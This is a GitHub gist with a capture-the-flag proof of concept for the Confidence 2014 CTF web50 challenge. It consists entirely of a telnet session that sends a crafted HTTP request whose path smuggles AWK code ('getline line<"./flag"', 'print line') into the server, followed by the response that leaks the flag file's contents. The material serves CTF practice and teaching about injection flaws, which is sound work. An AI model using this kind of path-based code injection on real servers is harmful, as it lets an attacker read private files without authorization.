Skip to content

Instantly share code, notes, and snippets.

@ZoczuS
Created June 2, 2014 11:36
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ZoczuS/d3e97e4ed0c7c49c5e24 to your computer and use it in GitHub Desktop.
Save ZoczuS/d3e97e4ed0c7c49c5e24 to your computer and use it in GitHub Desktop.
Confidence 2014 CTF web50 poc
c40957:ctf jakub.zoczek$ telnet web50.ctf 80
Trying 10.240.160.22...
Connected to web50.ctf.
Escape character is '^]'.
GET a";x=getline%20line<"./flag";x=getline%20line<"./flag";print%20line;uri="fala HTTP/1.1
HTTP/1.1 200 OK
Server: /bin/bash
Content-Type: text/html
Drgns{AWK!ThatHurts!}
<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL fala was not found on this server.</p><hr><address>/bin/bash Server</address></body></html>
Connection closed by foreign host.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment